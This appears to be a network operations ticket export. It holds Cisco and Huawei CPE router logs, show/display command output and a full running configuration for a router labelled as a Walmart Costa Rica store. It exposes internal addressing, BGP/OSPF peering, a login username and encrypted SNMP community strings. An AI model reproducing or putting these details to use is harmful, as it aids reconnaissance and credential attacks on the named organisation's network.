    TRAP LOGGING: LEVEL INFORMATIONAL, 4522 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
XPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 66.240.219.146
*JUN  2 11:14:48.207 UTC: %SSH-3-NO_MATCH: NO MATCHING KEX ALGORITHM FOUND: CLIENT CURVE25519-SHA256,CURVE25519-SHA256@LIBSSH.ORG,ECDH-SHA2-NISTP256,ECDH-SHA2-NISTP384,ECDH-SHA2-NISTP521,DIFFIE-HELLMAN-GROUP-EXCHANGE-SHA256,DIFFIE-HELLMAN-GROUP16-SHA512,DIFFIE-HELLMAN-GROUP18-SHA512,DIFFIE-HELLMAN-GROUP14-SHA256,EXT-INFO-C SERVER DIFFIE-HELLMAN-GROUP-EXCHANGE-SHA1,DIFFIE-HELLMAN-GROUP14-SHA1
*JUN  2 11:14:48.221 UTC: %SSH-3-NO_MATCH: NO MATCHING KEX ALGORITHM FOUND: CLIENT CURVE25519-SHA256,CURVE25519-SHA256@LIBSSH.ORG,ECDH-SHA2-NISTP256,ECDH-SHA2-NISTP384,ECDH-SHA2-NISTP521,DIFFIE-HELLMAN-GROUP-EXCHANGE-SHA256,DIFFIE-HELLMAN-GROUP16-SHA512,DIFFIE-HELLMAN-GROUP18-SHA512,DIFFIE-HELLMAN-GROUP14-SHA256,EXT-INFO-C SERVER DIFFIE-HELLMAN-GROUP-EXCHANGE-SHA1,DIFFIE-HELLMAN-GROUP14-SHA1
*JUN  2 13:15:04.304 UTC: %SSH-3-NO_MATCH: NO MATCHING HOSTKEY ALGORITHM FOUND: CLIENT ECDSA-SHA2-NISTP256,ECDSA-SHA2-NISTP384,ECDSA-SHA2-NISTP521 SERVER SSH-RSA
*JUN  2 13:15:04.593 UTC: %SSH-3-NO_MATCH: NO MATCHING HOSTKEY ALGORITHM FOUND: CLIENT SSH-DSS SERVER SSH-RSA
*JUN  2 13:15:06.386 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 192.53.113.110
*JUN  2 13:15:06.665 UTC: %SSH-3-NO_MATCH: NO MATCHING HOSTKEY ALGORITHM FOUND: CLIENT SSH-ED25519 SERVER SSH-RSA
*JUN  2 15:54:56.591 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 61.177.173.46
*JUN  2 15:58:51.207 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 61.177.173.36
*JUN  3 00:27:14.684 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 80.82.77.33
*JUN  3 05:43:41.880 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 185.130.44.108
*JUN  3 12:11:22.915 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 218.92.0.221
*JUN  3 15:39:47.733 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 71.6.199.23
*JUN  4 01:47:25.791 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 85.38.107.132
*JUN  4 02:36:13.513 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:13.515 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:14.513 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:14.514 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:20.447 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:20.454 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 02:36:21.449 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:21.456 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 02:36:41.518 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:41.521 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:42.518 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:42.518 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:45.441 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:45.447 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 02:36:46.444 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:46.449 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 03:37:47.274 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.105.59.1] [LOCALPORT: 23] AT 03:37:47 UTC SAT JUN 4 2022
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
SHOW CLOCK
*03:38:03.818 UTC SAT JUN 4 2022
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.105.59.1             0   A4BE.2BE5.788F  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.105.59.6             -   E069.BA10.E080  ARPA   GIGABITETHERNET0/0/0
INTERNET  190.149.63.125          -   E069.BA10.E0F4  ARPA   VLAN1
INTERNET  190.149.63.126          0   6C3B.6BE9.B6D8  ARPA   VLAN1
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/927300001T/_/
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        UP             UP
GI0/1/1                        DOWN           DOWN
GI0/1/2                        DOWN           DOWN
GI0/1/3                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.105.59.6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99.69   YES NVRAM  UP                    UP
VLAN1                  190.149.63.125  YES NVRAM  UP                    UP
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.105.59.6
  PING 10.105.59.6: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.59.6 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/3 MS
RUTA IP:
PE: 10.179.28.34
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.105.59.6
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.105.59.6/32  DIRECT  0    0                 0.0.0.0         VLANIF3750			</t>
  </si>
  <si>
    <t>F4589663</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO ENLACE OPERATIVO SE PROCEDE CON CIERRE DE TICKET .
ROUTER CPE ACTIVO HACE 56 SEMANAS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.160 (AR160 V200R008C20SPC800)
COPYRIGHT (C) 2011-2016 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 56 WEEKS, 0 DAY, 15 HOURS, 12 MINUTES
MPU 0(MASTER) : UPTIME IS 56 WEEKS, 0 DAY, 15 HOURS, 12 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_3031&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R008C20SPC800]
#
 SYSNAME CC_WALMART_CR_TIENDA_3031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2.28 0.0.0.3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H8IZB|C#FI`D1M/F1!A,53}Y(O`&gt;9/RY;Z"L13@J#SO6%G&amp;^CPD^$7#[{H4P%^%#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
INTERFACE ETHERNET0/0/0
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 MTU 1778
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001456904OC/_/
 SET FLOW-STAT INTERVAL 30
#
INTERFACE GIGABITETHERNET0/0/0.1107
 DESCRIPTION PRIMARY LINK TO MTR105
 BANDWIDTH 4096
 DOT1Q TERMINATION VID 1107
 IP ADDRESS 10.201.11.154 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2107
 DESCRIPTION REDUNDANCY LINK TO MTR488
 DOT1Q TERMINATION VID 2107
 IP ADDRESS 10.201.41.154 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.32.2.29 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE GIGABITETHERNET0/0/5.2
#
INTERFACE CELLULAR0/0/0
#
INTERFACE CELLULAR0/0/1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.71 255.255.255.255
#
BGP 64528
 ROUTER-ID 10.99.77.71
 PEER 10.201.11.129 AS-NUMBER 14754
 PEER 10.201.41.129 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.71 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.129 ENABLE
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.129 NEXT-HOP-LOCAL
  PEER 10.201.41.129 ENABLE
  PEER 10.201.41.129 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT ROUTE-POLICY OSPF_DATOS_WALMART
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.2.28 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0360DEF3292FF5
 SNMP-AGENT COMMUNITY READ %^%#8U1SI&lt;M;#;WBL~9SEV/)Z}X`(:%&amp;(G`I!'DNC&gt;^GJG9ELRP,FER|]XODXTWA7X.*W*_}$M"W2#.`X4X$%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#AHORH&gt;DD2YWE@{S5GZ_E;^|V@1DWH48H*GK)1^I&gt;:BD"JCCL&lt;"0HB3PM,.~6NNRTM,FIMWP-IZV`JQPI%^%#
 SNMP-AGENT SYS-INFO LOCATION MXM ALAJUELA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
INTERFACE WLAN-RADIO0/0/1
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
 NTP-SERVICE UNICAST-PEER 10.201.41.129
 NTP-SERVICE UNICAST-SERVER 10.201.11.129 PREFERENCE
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
RETURN
&lt;CC_WALMART_CR_TIENDA_3031&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 25698
CURRENT MESSAGES: 512
JUN  4 2022 01:00:49-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[0]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN  4 2022 01:00:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[1]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.129.
JUN  4 2022 01:00:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/STRATUM_CHANGE(L)[2]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
JUN  4 2022 01:00:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/LEAP_CHANGE(L)[3]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
JUN  4 2022 01:00:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[4]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.129.
JUN  4 2022 01:00:08-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[5]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  4 2022 01:00:05-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[6]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN  3 2022 22:14:47-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/SOURCE_LOST(L)[7]:SYSTEM SYNCHRONIZATION SOURCE LOST.
JUN  3 2022 22:14:18-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[8]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.129.
JUN  3 2022 22:04:35-06:00 CC_WALMART_CR_TIENDA_3031 %%01RM/4/IPV4_DEFT_RT_CHG(L)[9]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.2107, NEXTHOP=10.201.41.129, NEIGHBOUR=10.201.41.129, PREFERENCE=255, LABEL=NULL, METRIC=0)
JUN  3 2022 22:04:35-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[10]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
JUN  3 2022 22:04:23-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[11]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
JUN  1 2022 03:53:59-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[12]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN  1 2022 03:53:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[13]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 12:32:36-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[14]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 12:31:56-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[15]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 12:31:16-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[16]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 11:32:58-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[17]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 11:32:18-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[18]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 11:31:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[19]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:59:03-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[20]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:58:23-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[21]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:57:43-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[22]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:18:52-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[23]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:18:12-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[24]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 04:33:42-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[25]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 04:33:02-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[26]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 04:32:22-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[27]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  4 2022 20:28:12-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[28]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
MAY  4 2022 20:28:10-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[29]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.129.
MAY  4 2022 20:28:10-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/STRATUM_CHANGE(L)[30]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
MAY  4 2022 20:28:10-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/LEAP_CHANGE(L)[31]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
MAY  4 2022 20:28:10-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[32]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.129.
MAY  4 2022 20:27:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[33]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAY  4 2022 20:27:37-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[34]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAY  4 2022 11:40:05-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/SOURCE_LOST(L)[35]:SYSTEM SYNCHRONIZATION SOURCE LOST.
MAY  4 2022 11:37:54-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[36]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.129.
MAY  4 2022 11:28:02-06:00 CC_WALMART_CR_TIENDA_3031 %%01RM/4/IPV4_DEFT_RT_CHG(L)[37]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.2107, NEXTHOP=10.201.41.129, NEIGHBOUR=10.201.41.129, PREFERENCE=255, LABEL=NULL, METRIC=0)
MAY  4 2022 11:28:01-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[38]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
MAY  4 2022 11:28:00-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[39]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
MAY  1 2022 07:06:37-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[40]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 07:05:57-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[41]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 07:05:17-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[42]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 06:17:54-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[43]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 06:17:14-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[44]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 04:33:06-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[45]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 04:32:26-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[46]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 07:08:23-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[47]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 07:07:43-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[48]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 07:07:03-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[49]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:22:12-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[50]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:21:32-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[51]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 04:25:16-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[52]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 04:24:36-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[53]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 04:23:56-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[54]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 15 2022 06:46:58-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[55]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 15 2022 06:22:31-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[56]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 15 2022 06:21:51-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[57]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
